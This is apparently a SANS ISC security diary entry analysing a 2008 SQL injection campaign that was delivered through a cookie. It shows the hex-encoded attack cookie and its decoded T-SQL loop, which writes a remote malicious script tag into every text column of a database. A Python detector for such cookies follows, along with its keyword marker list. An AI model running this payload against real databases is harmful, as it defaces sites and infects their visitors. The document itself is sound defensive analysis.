MSIE 0-day Spreading Via SQL Injection

Published: 2008-12-12
Last Updated: 2008-12-12 01:00:18 UTC
by Johannes Ullrich (Version: 1)

One of our readers submitted this log entry, which shows a typical SQL injection exploit. The "new" part is that the JavaScript injected in this case tries to exploit the MSIE 0-day:

In this case, the SQL injection is delivered as a cookie, not a GET parameter.

I broke up the strings for readability and inserted spaces around the malicious URL. As usual with these kinds of exploits, the injected script loads another script, which loads yet another script, ultimately leading to the IE exploit.


Cookie: ref=ef';DECLA RE @S VARCHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263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2633D687474703A2F2F313767616D6F2E636F6D2F312E6A733E3C2F7363726970743E272
727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544
F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4
F43415445205461626C655F437572736F72 AS VARCHAR(4000));exec (@S);--


Decoded as:
DECLARE @T varchar(255),@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
  select a.name,b.name from sysobjects a,syscolumns b
  where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or
                      b.xtype=231 or b.xtype=167)

OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+']
   set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+
       ''<script src=http:// 17gamo . com/1.js></script>''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor
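The only obfuscation in this payload is the CAST(0x... AS VARCHAR) hex literal, which is also what makes it easy to spot in web logs: a cookie value that carries a hex literal, decodes to T-SQL touching sysobjects/syscolumns, and ends in exec(@S) is not something a legitimate application ever sends. The following detector is an added example for defenders, not code from the diary or from any ISC tool; it decodes each CAST(0x...) literal in a Cookie header and checks the decoded text for the markers seen above. The sample cookie is constructed inline from a shortened copy of the decoded cursor loop and uses the placeholder host example.invalid instead of the real malicious domain.

```python
import re
from typing import Dict, List

# Constructed sample payload (not the diary's real hex, which is truncated above):
# a shortened version of the cursor-based UPDATE loop shown in the decoded SQL,
# with the attacker's domain replaced by a placeholder.
SAMPLE_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name "
    "from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] "
    "set ['+@C+']=rtrim(convert(varchar(4000),['+@C+']))+"
    "''<script src=http://example.invalid/1.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)

# Constructed Cookie header values: one hex-encoded the way the attacker's
# CAST(0x... AS VARCHAR) trick does, one benign.
SAMPLE_COOKIE = (
    "ref=ef';DECLARE @S VARCHAR(4000);SET @S=CAST(0x"
    + SAMPLE_SQL.encode("ascii").hex().upper()
    + " AS VARCHAR(4000));exec (@S);--"
)
BENIGN_COOKIE = "ref=homepage; session=abc123"

# Hex literal inside CAST(...); case-insensitive because T-SQL keywords are.
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)", re.IGNORECASE)
# exec of a variable is how the decoded stage gets run.
EXEC_VAR = re.compile(r"exec\s*\(\s*@\w+\s*\)", re.IGNORECASE)
# Markers this campaign's decoded stage relies on (matched on lowercased text).
SUSPICIOUS = ("sysobjects", "syscolumns", "exec(", "<script", "table_cursor")


def decode_hex_literals(cookie: str) -> List[str]:
    """Return the ASCII decoding of every CAST(0x...) literal in a cookie string."""
    decoded = []
    for match in HEX_CAST.finditer(cookie):
        hexstr = match.group(1)
        if len(hexstr) % 2:
            # Odd length means a truncated log line; decode the complete bytes only.
            hexstr = hexstr[:-1]
        decoded.append(bytes.fromhex(hexstr).decode("ascii", errors="replace"))
    return decoded


def score_cookie(cookie: str) -> Dict[str, object]:
    """Decode hex literals in a Cookie header and flag the SQL-injection pattern."""
    decoded = decode_hex_literals(cookie)
    hits = set()
    for text in decoded:
        lowered = text.lower()
        hits.update(marker for marker in SUSPICIOUS if marker in lowered)
    # A hex literal that is then handed to exec(@var) is a strong signal on its
    # own, even if the decoded body uses markers not in our short list.
    exec_of_variable = EXEC_VAR.search(cookie) is not None
    return {
        "hex_literals": len(decoded),
        "decoded": decoded,
        "markers": sorted(hits),
        "malicious": bool(hits) or (bool(decoded) and exec_of_variable),
    }


if __name__ == "__main__":
    for label, cookie in (("sample", SAMPLE_COOKIE), ("benign", BENIGN_COOKIE)):
        result = score_cookie(cookie)
        print(label, "malicious" if result["malicious"] else "clean", result["markers"])
```

The decode step matters more than the marker list: the hex literal is what lets this payload pass through any filter that only looks for plain-text keywords like `sysobjects` or `<script`, so a log review or WAF rule that never decodes the literal will miss it. Note that the same scan should be applied to GET and POST parameters, since the diary points out that the cookie is merely a different delivery channel for the same injection.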


------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
